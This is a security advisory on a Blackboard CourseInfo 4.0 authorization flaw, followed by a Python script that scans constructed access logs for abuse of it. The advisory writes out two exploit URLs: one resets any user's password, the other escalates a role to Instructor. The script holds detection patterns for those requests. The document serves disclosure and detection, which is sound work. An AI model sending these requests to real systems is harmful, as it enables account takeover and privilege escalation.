Blackboard CourseInfo 4.0 Database Modification Vulnerability

Any user with a valid account on Blackboard CourseInfo can modify the database by submitting arbitrary form values to any Perl script located in /bin and its subdirectories; the scripts act on the supplied parameters without checking that the caller is authorized to change the targeted account.

For example, the following URL will change the password of any known account:

http://target/bin/common/user_update_passwd.pl?user_id=<value>&firstname=<value>&lastname=<value>&course_id=<value>&password1=<value>&password2=<value>

The URL below will change a user's role to Student (value is "S"), Teacher Assistant (value is "T"), or Instructor (value is "G").

http://target/bin/common/user_update_admin.pl?user_id=<value>&course_id=<value>&role=<value>&available_ind=Y
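As an added detection example (not part of the original advisory), the Python script below scans constructed Apache-style access-log lines for requests to the two scripts named above. It assumes the legitimate CourseInfo form submits these values with POST, so account-modifying parameters appearing in a GET query string are treated as hand-crafted; the sample log lines, client addresses and user IDs are all constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2010:10:01:02 +0000] "GET /bin/common/user_update_passwd.pl?user_id=jdoe&firstname=John&lastname=Doe&course_id=CS101&password1=x&password2=x HTTP/1.0" 200 512
10.0.0.5 - - [12/Mar/2010:10:01:09 +0000] "GET /bin/common/user_update_admin.pl?user_id=asmith&course_id=CS101&role=G&available_ind=Y HTTP/1.0" 200 488
10.0.0.7 - - [12/Mar/2010:10:02:00 +0000] "POST /bin/common/user_update_passwd.pl HTTP/1.0" 200 512
10.0.0.9 - - [12/Mar/2010:10:03:00 +0000] "GET /bin/common/course_view.pl?course_id=CS101 HTTP/1.0" 200 2048
"""

# client, timestamp, method, request target, status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
# The two scripts named in the advisory.
TARGET_SCRIPTS = ("/bin/common/user_update_passwd.pl", "/bin/common/user_update_admin.pl")

def analyze(log_text):
    """Return a list of (client, timestamp, path, reason) findings."""
    findings = []
    targets = defaultdict(set)  # client -> distinct user_id values it tried to modify
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status = m.groups()
        url = urlsplit(target)
        if url.path not in TARGET_SCRIPTS:
            continue
        params = parse_qs(url.query)
        # Assumption: the real form POSTs these fields, so a GET carrying
        # password1 or role in the URL indicates a hand-crafted request.
        if method == "GET" and ("password1" in params or "role" in params):
            findings.append((client, ts, url.path, "account-modifying parameters in GET query string"))
        # Role escalation to Instructor ("G" per the advisory) deserves its own alert.
        if params.get("role") == ["G"]:
            findings.append((client, ts, url.path, "role set to G (Instructor)"))
        for uid in params.get("user_id", []):
            targets[client].add(uid)
    # One client modifying several different accounts is the advisory's scenario.
    for client, uids in targets.items():
        if len(uids) > 1:
            findings.append((client, None, None, f"modified {len(uids)} distinct user_ids"))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```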

Copyright 2010, SecurityFocus